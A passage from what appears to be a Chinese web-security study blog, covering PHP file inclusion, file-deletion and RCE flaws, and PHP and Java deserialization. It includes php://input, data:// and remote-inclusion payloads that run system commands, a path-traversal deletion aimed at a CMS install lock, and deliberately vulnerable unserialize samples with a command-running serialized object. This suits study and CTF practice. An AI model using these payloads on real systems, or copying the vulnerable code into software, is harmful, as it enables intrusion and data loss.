(cnblogs.com)<\/a><\/li>\n\n\n\n<li>\u4f2a\u534f\u8bae<\/li>\n<\/ol>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-80e597c4302fb9fd15a215ecca205da0\"><strong>\u9ed1\u76d2\u6d4b\u8bd5<\/strong>\uff1a\u68c0\u67e5\u662f\u5426\u6709\u53c2\u6570\u4f20\u9012\u6587\u4ef6\u540d\uff0c\u4f8b\u5982?file=index.php<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-287cebf881be14bf0aa105104ab98c9e\">\u7528\u4e8e\u8bfb\u53d6\u6587\u4ef6\u65f6\u6839\u636e\u4e0d\u540c\u6761\u4ef6\u9009\u7528\u4e0d\u540c\u7684<strong>\u4f2a\u534f\u8bae<\/strong>\uff0c\u4f2a\u534f\u8bae\u6ca1\u6709\u4e0a\u4f20\u6587\u4ef6\u4e5f\u80fd\u8fdb\u884cphp\u4ee3\u7801\u6267\u884c\u3002\u53c2\u8003\u6587\u7ae0\uff1a<a href=\"https:\/\/segmentfault.com\/a\/1190000018991087\" target=\"_blank\" rel=\"noreferrer noopener\">PHP\u4f2a\u534f\u8bae\u603b\u7ed3 &#8211; \u4e2a\u4eba\u6587\u7ae0 &#8211; SegmentFault \u601d\u5426<\/a><\/p>\n\n\n\n<p>php&amp;http\u534f\u8bae\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>?file=php:\/\/filter\/read=convert.base64-encode\/resource=flag.php  \/\/filter\u9700\u8981\u5b8c\u6574\u8def\u5f84\u540d\u3002\u4e0d\u80fd\u7528*<\/li>\n\n\n\n<li>?file=php:\/\/input  \/\/\u5728POST\u91cc\u5199\u547d\u4ee4\uff1a&lt;?php system(&#8216;tac flag.php&#8217;);?&gt;<\/li>\n\n\n\n<li>?file=http:\/\/mikuhacker.cn\/test.txt  \/\/test.txt\uff1a&lt;?php system(&#8216;tac flag.php&#8217;);?&gt;<\/li>\n<\/ul>\n\n\n\n<p>data&amp;http\u534f\u8bae\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>?file=data:\/\/text\/plain,&lt;?=system(&#8216;tac flag.*&#8217;);?&gt;<\/li>\n\n\n\n<li>?file=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs\/Pg==<\/li>\n\n\n\n<li>?file=http:\/\/mikuhacker.cn\/test.txt  \/\/test.txt\uff1a&lt;?php system(&#8216;tac flag.php&#8217;);?&gt;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u5341\u4e94\u5929\uff1aWEB\u653b\u9632-\u6587\u4ef6\u64cd\u4f5c\u7c7b\u5b89\u5168<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6587\u4ef6\u4e0b\u8f7d\uff1a\u5229\u7528\u4e0b\u8f7d\u83b7\u53d6<strong>\u6e90\u7801<\/strong>\u6216<strong>\u6570\u636e\u5e93\u914d\u7f6e\u6587\u4ef6<\/strong>\u53ca\u7cfb\u7edf\u654f\u611f\u6587\u4ef6\u4e3a\u540e\u7eed\u627e\u601d\u8def<\/li>\n\n\n\n<li>\u6587\u4ef6\u8bfb\u53d6\uff1a\u548c\u6587\u4ef6\u4e0b\u8f7d\u5229\u7528\u65b9\u5f0f\u7c7b\u4f3c<\/li>\n\n\n\n<li>\u6587\u4ef6\u5220\u9664\uff1a\u9664\u81ea\u8eab\u5b89\u5168\u5f15\u53d1\u7684\u6587\u4ef6\u5220\u9664\u5916\uff0c\u53ef\u914d\u5408\u5220\u9664\u91cd\u88c5\u9501\u5b9a\u6587\u4ef6\u8fdb\u884c\u91cd\u88c5\uff08\u4f8b\u5982\u5220\u6389wordpress\u7684wp-config.php\u4f1a\u5bfc\u81f4\u8df3\u8f6c\u5230setup-config.php\u91cd\u65b0\u914d\u7f6ewordpress\u5e76\u751f\u6210\u65b0\u7684wp-config.php\uff09<\/li>\n<\/ul>\n\n\n\n<p>\u767d\u76d2\u5ba1\u8ba1\u6d41\u7a0b\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6587\u4ef6\u4e0b\u8f7d\uff1a\u529f\u80fd\u70b9\u6293\u5305-\u5bfb\u627e\u4ee3\u7801\u6587\u4ef6-\u5bfb\u627e\u53d8\u91cf\u63a7\u5236-\u6784\u9020Payload<\/li>\n\n\n\n<li>\u6587\u4ef6\u5220\u9664\uff1a\u7279\u5b9a\u51fd\u6570\u641c\u7d22-\u5bfb\u627e\u89e6\u53d1\u8c03\u7528-\u6784\u9020Payload\uff1a\/admin\/admin_article.php?act=del_img&amp;img=..\/..\/data\/install.lock<\/li>\n\n\n\n<li>\u6587\u4ef6\u8bfb\u53d6\uff1a\u7279\u5b9a\u51fd\u6570\u641c\u7d22-\u5bfb\u627e\u89e6\u53d1\u8c03\u7528-\u6784\u9020Payload<\/li>\n<\/ul>\n\n\n\n<p>\u9ed1\u76d2\u63a2\u9488\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>URL\u53c2\u6570\u540d\u53ca\u53c2\u6570\u503c\u5206\u6790\uff1a\u53c2\u6570\u540d\u82f1\u6587\u5bf9\u5e94\u7ffb\u8bd1\uff0c\u53c2\u6570\u503c\u5bf9\u5e94\u76ee\u5f55\u6216\u6587\u4ef6\u540d<\/li>\n\n\n\n<li>\u529f\u80fd\u70b9\u81ea\u884c\u4fee\u6539\u540e\u5206\u6790\uff1a\u6587\u4ef6\u4e0b\u8f7d\uff0c\u5220\u9664\uff0c\u8bfb\u53d6\u7b49<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u5341\u516d\u5929\uff1aWEB\u653b\u9632-RCE<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>RCE\u4ee3\u7801\u6267\u884c\uff1aeval(&#8216;phpinfo()&#8217;)\uff1b\u5f15\u7528\u811a\u672c\u4ee3\u7801\u89e3\u6790\u6267\u884c<\/li>\n\n\n\n<li>RCE\u547d\u4ee4\u6267\u884c\uff1asystem(&#8216;ipconfig&#8217;)\uff1b\u811a\u672c\u8c03\u7528\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u6f0f\u6d1e\u51fd\u6570<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-d9d01725e3f5174952b49d1caffe2761\">PHP\uff1aeval(),assert(),preg_replace(),call_user_func(),call_user_func_array(),array_map()\uff1bsystem,shell_exec,popen,passthru,proc_open<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-f097caaa346744bb4233255bfffabc72\">Python\uff1aeval,exec,subprocess,os.system,commands<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-500e35b39f364f4f29d88bf5286b8ef6\">Java\uff1aJava\u6ca1\u6709\u7c7b\u4f3cphp\u4e2deval\u8fd9\u79cd\u76f4\u63a5\u53ef\u4ee5\u5c06\u5b57\u7b26\u4e32\u8f6c\u5316\u4e3a\u4ee3\u7801\u6267\u884c\u7684\u51fd\u6570\uff0c\u4f46\u662f\u6709\u53cd\u5c04\u673a\u5236\uff0c\u5e76\u4e14\u6709\u5404\u79cd\u57fa\u4e8e\u53cd\u5c04\u673a\u5236\u7684\u8868\u8fbe\u5f0f\u5f15\u64ce\uff0c\u5982OGNL\uff0cSPEL\uff0cMVEL\u7b49<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-e9edc3d440d6746180babdb1b58166e6\">\u5e38\u89c1RCE\u8fc7\u6ee4\u7684\u7ed5\u8fc7\u6280\u5de7\uff1a\u901a\u914d\u7b26\u3001\u53d6\u4ee3\u51fd\u6570&amp;\u901a\u914d\u7b26&amp;\u7ba1\u9053\u7b26\u3001\u53c2\u6570\u9003\u9038\u3001\u5305\u542b&amp;\u4f2a\u534f\u8bae\u3001\u5305\u542b&amp;\u4f2a\u534f\u8bae&amp;\u901a\u914d\u7b26<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u767d\u76d2\u5ba1\u8ba1-PbootCMS-RCE<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-7a6d7a4d281bc0ddcc25f2091c929449\">\u641c\u7d22\u7279\u5b9a\u51fd\u6570-&gt;parserlfLabel-&gt;parserCommom-&gt;About&amp;Content-&gt;\u6784\u9020AboutController\u3001ContentController<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u5341\u4e03\u5929\uff1aWEB\u653b\u9632-\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"> PHP\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-c9d9cfdc201efbf71c8f30e6529d8932\"><strong>\u5e8f\u5217\u5316<\/strong>\uff1a\u5c06\u5bf9\u8c61\u8f6c\u6362\u4e3a\u6570\u7ec4\u6216\u5b57\u7b26\u4e32\u7b49\u683c\u5f0f<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-a664fb83d536de3a17c65c7f51e9d5f1\"><strong>\u53cd\u5e8f\u5217\u5316<\/strong>\uff1a\u5c06\u6570\u7ec4\u6216\u5b57\u7b26\u4e32\u7b49\u683c\u5f0f\u8f6c\u6362\u6210\u5bf9\u8c61<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-d782a3e1ac8465c3943129cf12a944f4\"><strong>\u76ee\u7684<\/strong>\uff1a\u5c06\u5bf9\u8c61\u5b9e\u4f53\u5c01\u88c5\uff0c\u4fbf\u4e8e\u5728WEB\u4e2d\u4f20\u8f93\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-3ec40f2b12b5f82503c12c89845f737e\"><strong>\u51fd\u6570\u63a5\u53e3<\/strong>\uff1aserialize()\u3001unserialize()<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\nclass test{\n    public $name='MikuHacker';\n    public $age='Unknow';\n}\n$example=new test();\/\/\u5b9e\u4f53\u5316example\n$s=serialize($example);\/\/\u5c06example\u5e8f\u5217\u5316\u5f97\u5230\u5b57\u7b26\u4e32$s\n$u=unserialize($s);\/\/\u5c06\u5e8f\u5217\u5316\u5b57\u7b26\u4e32$s\u53cd\u5e8f\u5217\u5316\u5f97\u5230\u5bf9\u8c61$u<\/code><\/pre>\n\n\n\n<p>\u539f\u7406\uff1a\u672a\u5bf9\u7528\u6237\u8f93\u5165\u7684\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u8fdb\u884c\u68c0\u6d4b\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u63a7\u5236\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\uff0c\u4ece\u800c\u5bfc\u81f4\u4ee3\u7801\u6267\u884c\uff0cSQL\u6ce8\u5165\uff0c\u76ee\u5f55\u904d\u5386\u7b49\u7ed3\u679c\u3002\u5728\u53cd\u5e8f\u5217\u5316\u65f6\u53ef\u80fd\u4f1a\u81ea\u52a8\u89e6\u53d1\u5bf9\u8c61\u4e2d\u7684\u4e00\u4e9b\u9b54\u672f\u65b9\u6cd5\u5bfc\u81f4\u6f0f\u6d1e\u5229\u7528\u3002<\/p>\n\n\n\n<p>\u89e6\u53d1\u6761\u4ef6\uff1aunserialize\u51fd\u6570\u7684\u53d8\u91cf\u53ef\u63a7\uff0c\u6587\u4ef6\u4e2d\u5b58\u5728\u53ef\u5229\u7528\u7684\u7c7b\uff0c\u7c7b\u4e2d\u6709\u9b54\u672f\u65b9\u6cd5\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>__construct()\uff1a\u5f53\u5bf9\u8c61\u88ab\u521b\u5efa\u65f6\u4f1a\u88ab\u81ea\u52a8\u8c03\u7528<\/li>\n\n\n\n<li>__destruct()\uff1a\u5f53\u5bf9\u8c61\u88ab\u9500\u6bc1\u65f6\u4f1a\u88ab\u81ea\u52a8\u8c03\u7528<\/li>\n\n\n\n<li>__wakeup()\uff1a\u8c03\u7528unserialize()\u65f6\u4f1a\u88ab\u81ea\u52a8\u8c03\u7528<\/li>\n\n\n\n<li>__invoke()\uff1a\u5c1d\u8bd5\u4ee5\u8c03\u7528\u51fd\u6570\u7684\u65b9\u6cd5\u8c03\u7528\u4e00\u4e2a\u5bf9\u8c61\u65f6\uff0c\u4f1a\u88ab\u81ea\u52a8\u8c03\u7528<\/li>\n\n\n\n<li>__call()\uff1a\u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1<\/li>\n\n\n\n<li>__callStatic()\uff1a\u5728\u9759\u6001\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1<\/li>\n\n\n\n<li>__get()\uff1a\u7528\u4e8e\u4ece\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e2d\u8bfb\u53d6\u6570\u636e<\/li>\n\n\n\n<li>__set()\uff1a\u7528\u4e8e\u5c06\u6570\u636e\u5199\u5165\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027<\/li>\n\n\n\n<li>__isset()\uff1a\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u8c03\u7528isset()\u6216empty()\u65f6\u89e6\u53d1<\/li>\n\n\n\n<li>__unset()\uff1a\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset\u65f6\u89e6\u53d1\uff0c\u9500\u6bc1\u5bf9\u8c61\u7684\u67d0\u4e2a\u5c5e\u6027\u65f6\u4f1a\u89e6\u53d1<\/li>\n\n\n\n<li>__toString()\uff1a\u628a\u7c7b\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1<\/li>\n\n\n\n<li>__sleep()\uff1a\u8c03\u7528serialize()\u51fd\u6570\u65f6\u4f1a\u68c0\u6d4b\u7c7b\u4e2d\u662f\u5426\u5b58\u5728__sleep()\u65b9\u6cd5\uff0c\u82e5\u5b58\u5728\u5219\u4f1a\u88ab\u4f18\u5148\u8c03\u7528<\/li>\n<\/ul>\n\n\n\n<p>\u5b89\u5168\u95ee\u9898A\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\nclass A{\n    public $var='Hello World';\n    public function test(){\n        echo $this-&gt;var;\n        echo '&lt;br&gt;';\n    }\n    public function __destruct(){\n        echo 'UserName'.'&lt;br&gt;';\n    }\n    public function __construct(){\n        echo 'PassWord'.'&lt;br&gt;';\n    }\n    public function __toString(){\n        return 'No way to see'.'&lt;br&gt;';\n    }\n}\n$t=unserialize($_GET&#91;'x']);\n?&gt;<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-e5e19b703e4a68e2a3742d19342c9984\">\u4e00\u65e6\u5229\u7528\u4f20\u5165\u503cx\u4f20\u5165\u4e00\u4e32\u5e8f\u5217\u5316\u5b57\u7b26\u7528\u4e8e\u521b\u5efa\u4e00\u4e2a\u65b0\u5bf9\u8c61\uff0c\u4f1a\u9996\u5148\u81ea\u52a8\u8c03\u7528__construct\u65b9\u6cd5\u6253\u5370\u51faPassWord\uff0c\u5e76\u5728\u65b9\u6cd5\u7ed3\u675f\u540e\u5f15\u64ce\u603b\u662f\u4f1a\u81ea\u52a8\u9500\u6bc1\u5bf9\u8c61\uff0c\u4e8e\u662f\u81ea\u52a8\u8c03\u7528__destruct\u51fd\u6570\u4ece\u800c\u6253\u5370\u51faUserName\u3002\u53e6\u5916\uff0c\u8c03\u7528test()\u51fd\u6570\u540e\uff0c\u53c8\u4f1a\u89e6\u53d1__toString\u51fd\u6570\u3002\u672c\u8eab\u53ea\u662f\u4e00\u6bb5\u5b9e\u73b0\u7528test\u51fd\u6570\u6253\u5370\u5b57\u7b26\u7684\u4ee3\u7801\uff0c\u5374\u56e0\u4e3a\u9b54\u672f\u65b9\u6cd5\u7684\u81ea\u52a8\u8c03\u7528\u800c\u5b58\u5728\u4e86\u5176\u5b83\u529f\u80fd\u3002<\/p>\n\n\n\n<p>\u6784\u9020POP\u94fe\u83b7\u53d6\u521b\u5efa\u65b0\u5bf9\u8c61\u7684\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\nclass A{\n    public $var='Hello World';\n    public function test(){\n        echo $this-&gt;var;\n        echo '&lt;br&gt;';\n    }\n    public function __destruct(){\n        echo 'UserName'.'&lt;br&gt;';\n    }\n    public function __construct(){\n        echo 'PassWord'.'&lt;br&gt;';\n    }\n    public function __toString(){\n        return 'No way to see'.'&lt;br&gt;';\n    }\n}\n$a=new A();\/\/\u5b9e\u4f53\u5316\uff0c\u89e6\u53d1__construct\n$a-&gt;test();\/\/\u89e6\u53d1test\n$b=serialize($a);\/\/\u5c06\u5b9e\u4f53\u5bf9\u8c61\u5e8f\u5217\u5316\necho $b;\/\/\u6253\u5370\u51fa\u6240\u9700\u7684Payload\u4f5c\u4e3ax\u503c\u4f20\u5165\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u5b89\u5168\u95ee\u9898B\uff08\u6f0f\u6d1e\u6f14\u793a\uff09\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\nclass B{\n    public function __destruct(){\n        system('ipconfig');\n    }\n    public function __construct(){\n        echo 'MikuHacker'.'&lt;br&gt;';\n    }\n}\nunserialize($_GET&#91;'x']);\n?&gt;<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-8b50c36ffdff29d271e5dce3e38ce585\">\u6b64\u65f6\u4f20\u5165\u521b\u5efa\u5b9e\u4f53\u5bf9\u8c61\u7684\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u5373\u53ef\u5b9e\u73b0\u547d\u4ee4\u6267\u884c\u6253\u5370\u51fa\u7f51\u5361\u4fe1\u606f\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-57dc30983bcac526ad1bf368235b68c8\">\u5b89\u5168\u95ee\u9898C\uff08\u5b9e\u9645\u5229\u7528\u7684\u7b80\u5355\u6f14\u793a\uff09\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\nclass C{\n    public $cmd='ipconfig';\n    public function __destruct(){\n        system($this-&gt;cmd);\n    }\n    public function __construct(){\n        echo 'MikuHacker'.'&lt;br&gt;';\n    }\n}\nunserialize($_GET&#91;'x']);\n?&gt;<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-f01e43f6ac15a37c51be29db1fca088e\">\u6b64\u65f6\u53ef\u4ee5<strong>\u63a7\u5236\u53d8\u91cfcmd<\/strong>\uff0c\u4f20\u5165\u5176\u5b83\u547d\u4ee4\u8fdb\u884c\u6267\u884c\u3002\u4f8b\u5982\u4f20\u5165\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\uff0c?x=O:1:&#8221;C&#8221;:1:{s:3:&#8221;cmd&#8221;;s:3:&#8221;cmd&#8221;;s:3:&#8221;ver&#8221;;}\u5219\u53ef\u4ee5\u6267\u884cver\u547d\u4ee4\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-b13edc5e732665c682da017414bc2953\">\u5173\u4e8e<strong>POP\u94fe\u7684\u6784\u9020<\/strong>\uff0c\u76f4\u63a5\u53c2\u8003\u5b66\u957f\u535a\u5ba2\u5c31\u8db3\u591f\u4e86\uff1a<a href=\"https:\/\/fushuling.com\/index.php\/2023\/01\/15\/pop%e4%b8%80%e5%91%bd%e9%80%9a%e5%85%b3\/\" target=\"_blank\" rel=\"noreferrer noopener\">POP\u4e00\u547d\u901a\u5173! \u2013 fushuling\u306eblog<\/a><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-032bc872f772087c8054187b56d64555\">CTF\u91cc<strong>\u6784\u9020\u597dPOP\u94fe\u5f97\u5230\u5e8f\u5217\u5316\u5b57\u7b26\u4e32<\/strong>\u5c31\u5dee\u4e0d\u591a\u4e86\uff0c\u5269\u4e0b\u7684\u5c31\u662f\u7ed5\u8fc7\u4e00\u4e9b\u5e38\u89c1\u7684<strong>\u5b57\u7b26\u8fc7\u6ee4<\/strong>\u4ee5\u53ca<strong>wakeup\u65b9\u6cd5\u7ed5\u8fc7<\/strong>\uff08\u591a\u5237\u9898\u5c31\u719f\u4e86\uff09\u3002<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-6881dae596b069982d13a0005947129b\"><strong>\u5ba1\u8ba1\u6316\u6d1e<\/strong>\u65f6\u7684\u601d\u8def\uff1a\u641c\u7d22\u8ddf\u8e2a\u5173\u952e\u51fd\u6570unserialize-\u8ddf\u8e2a\u76f8\u5173\u7c7b\u7684\u5b9a\u4e49-\u6784\u9020POP\u94fe\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-4ada4e529ea8704ff9b06c3cd7d88d21\">\u5bf9\u8c61\u53d8\u91cf\u5c5e\u6027\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>public\uff08\u516c\u5171\u5c5e\u6027\uff09\uff1a\u5728\u672c\u7c7b\u5185\u90e8\u3001\u5916\u90e8\u7c7b\u3001\u5b50\u7c7b\u90fd\u53ef\u4ee5\u8bbf\u95ee<\/li>\n\n\n\n<li>protect\uff08\u53d7\u4fdd\u62a4\u7684\uff09\uff1a\u53ea\u6709\u672c\u7c7b\u6216\u5b50\u7c7b\u6216\u7236\u7c7b\u4e2d\u53ef\u4ee5\u8bbf\u95ee<\/li>\n\n\n\n<li>private\uff08\u79c1\u4eba\u7684\uff09\uff1a\u53ea\u6709\u672c\u7c7b\u5185\u90e8\u53ef\u4ee5\u4f7f\u7528<\/li>\n\n\n\n<li>private\u5c5e\u6027\u5e8f\u5217\u5316\u7684\u65f6\u5019\u683c\u5f0f\u662f%00\u7c7b\u540d%00\u6210\u5458\u540d\uff08\u4f20\u5165\u65f6\u8981\u8865\u4e0a\uff09<\/li>\n\n\n\n<li>protect\u5c5e\u6027\u5e8f\u5217\u5316\u7684\u65f6\u5019\u683c\u5f0f\u662f%00*%00\u6210\u5458\u540d\uff08\u4f20\u5165\u65f6\u8981\u8865\u4e0a\uff09<\/li>\n<\/ul>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-099ecbdd722fd3a0c84a9e46e98f221e\">\u8fd8\u6709\u4e00\u4e2a\u8003\u70b9\u601d\u8def\u4e0d\u662f\u60f3\u529e\u6cd5\u89e6\u53d1\u9b54\u672f\u65b9\u6cd5\uff0c\u800c\u662f\u5229\u7528php\u81ea\u5e26\u7684<strong>\u539f\u751f\u7c7bSoapClient<\/strong>\u6765\u4f20\u5165\u503c\uff08\u6709\u5229\u7528\u6761\u4ef6\uff09\u3002\u53ef\u4ee5\u5229\u7528\u811a\u672c\u5de5\u5177\u5224\u65ad\u9b54\u672f\u65b9\u6cd5\u5bf9\u5e94\u7684\u539f\u751f\u7c7b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$classes=get_declared_classes();\nforeach($classes as $class){\n    $methods = get_class_methods($class);\n    foreach($methods as $method){\n        if(in_array($method,array(\n            '__destruct',\n            '__toString',\n            '__wakeup',\n            '__call',\n            '__callStatic',\n            '__get',\n            '__set',\n            '__isset',\n            '__unset',\n            '__invoke',\n            '__set_state',\n        ))){\n            print $class.'::'.$method.\"\\n\";\n        }\n    }\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-2ceb35f64ed9cb53fe5acba683fc4338\">\u5224\u65ad\u9b54\u672f\u65b9\u6cd5\u5bf9\u5e94\u7684\u539f\u751f\u7c7b\u540e\u518d\u641c\u4e00\u4e0b\u5229\u7528\u65b9\u5f0f\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Java\u53cd\u5e8f\u5316\u6f0f\u6d1e<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ffe34c087dfd18b640629562cd2dad7f\">\u5e8f\u5217\u5316\uff1a\u5c06Java\u5bf9\u8c61\u8f6c\u6362\u4e3a\u5b57\u8282\u5e8f\u5217<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-2adabe67a69312fe8b3ef7adddf08306\"><strong>\u53cd\u5e8f\u5217\u5316<\/strong>\uff1a\u5c06\u5b57\u8282\u5e8f\u5217\u6062\u590d\u4e3aJava\u5bf9\u8c61<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-f63012dfe3fa54843004560442ab4473\"><strong>\u5e8f\u5217\u5316\u7528\u9014<\/strong>\uff1a\u628a\u5bf9\u8c61\u7684\u5b57\u8282\u5e8f\u5217\u6c38\u4e45\u5730\u4fdd\u5b58\u5230\u786c\u76d8\u4e0a\uff0c\u901a\u5e38\u5b58\u653e\u5728\u4e00\u4e2a\u6587\u4ef6\u4e2d\uff08\u6301\u4e45\u5316\u5bf9\u8c61\uff09\uff1b\u5728\u7f51\u7edc\u4e0a\u4f20\u8f93\u5bf9\u8c61\u7684\u5b57\u8282\u5e8f\u5217\uff08\u7f51\u7edc\u4f20\u8f93\u5bf9\u8c61\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-668df3a41bb07a26d2f930e40c2a9ea3\"><strong>\u51fd\u6570\u63a5\u53e3<\/strong>\uff1aSerializable Externalizable\u63a5\u53e3\u3001fastjson\u3001jackson\u3001gson\u3001ObjectInputStream.read\u3001ObjectObjectInputStream.readUnshared\u3001XMLDecoder.read\u3001ObjectYaml.loadXStream.fromXML\u3001ObjectMapper.readValue\u3001JSON.parseObject<\/p>\n\n\n\n<p>\u6570\u636e\u51fa\u73b0\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u529f\u80fd\u7279\u6027\uff1a\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\u4e00\u822c\u5e94\u7528\u5728\u5bfc\u5165\u6a21\u677f\u6587\u4ef6\u3001\u7f51\u7edc\u901a\u4fe1\u3001\u6570\u636e\u4f20\u8f93\u3001\u65e5\u5fd7\u683c\u5f0f\u5316\u5b58\u50a8\u3001\u5bf9\u8c61\u6570\u636e\u843d\u78c1\u76d8\u3001DB\u5b58\u50a8\u7b49\u4e1a\u52a1\u573a\u666f\u3002\u5ba1\u8ba1\u8fc7\u7a0b\u4e2d\u91cd\u70b9\u5173\u6ce8\u8fd9\u4e9b\u529f\u80fd\u677f\u5757\u3002<\/li>\n\n\n\n<li>\u6570\u636e\u7279\u6027\uff1a\u4e00\u6bb5\u6570\u636e\u4ee5rO0AB\u5f00\u5934\uff0c\u5219\u57fa\u672c\u53ef\u4ee5\u786e\u5b9a\u662fJava\u5e8f\u5217\u5316Base64\u52a0\u5bc6\u7684\u6570\u636e\u3002\u6216\u8005\u4ee5aced\u5f00\u5934\uff0c\u5219\u662f\u4e00\u6bb5Java\u5e8f\u5217\u5316\u768416\u8fdb\u5236\u6570\u636e\u3002<\/li>\n\n\n\n<li>\u51fa\u73b0\u5177\u4f53\uff1ahttp\u53c2\u6570\u3001cookie\u3001session\u7684\u5b58\u50a8\u65b9\u5f0f\u53ef\u80fd\u662fBase64\uff08rO0\uff09\u3001\u538b\u7f29\u540e\u7684Base64\uff08H4s\uff09\u3001MII\u7b49<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-6fbbad2e9188dcd413a9c88122eeeda8\"><strong>\u9ed1\u76d2\u5206\u6790<\/strong>\uff1a\u6570\u636e\u5e93\u51fa\u73b0\u5730-\u89c2\u5bdf\u6570\u636e\u7279\u6027<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-e7cfe8499cad2f524e69b42b502e326b\"><strong>\u767d\u76d2\u5206\u6790<\/strong>\uff1a\u7ec4\u4ef6\u5b89\u5168&amp;\u51fd\u6570\u641c\u7d22&amp;\u529f\u80fd\u7279\u6027\u5206\u6790<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ffefa7283b4e0ccee1ee1fc6df58d4b3\"><strong>\u5229\u7528\u65b9\u5f0f<\/strong>\uff1aysoserial\u5de5\u5177\u751f\u6210Payload\uff08\u9700\u5148\u786e\u8ba4\u76ee\u6807\u5e8f\u5217\u5316\u73af\u5883\u6240\u7528\u7684\u5305\uff09<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Python\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<\/h3>\n\n\n\n<p>\u51fd\u6570\u5f15\u7528\uff1a<\/p>\n\n\n\n<ul 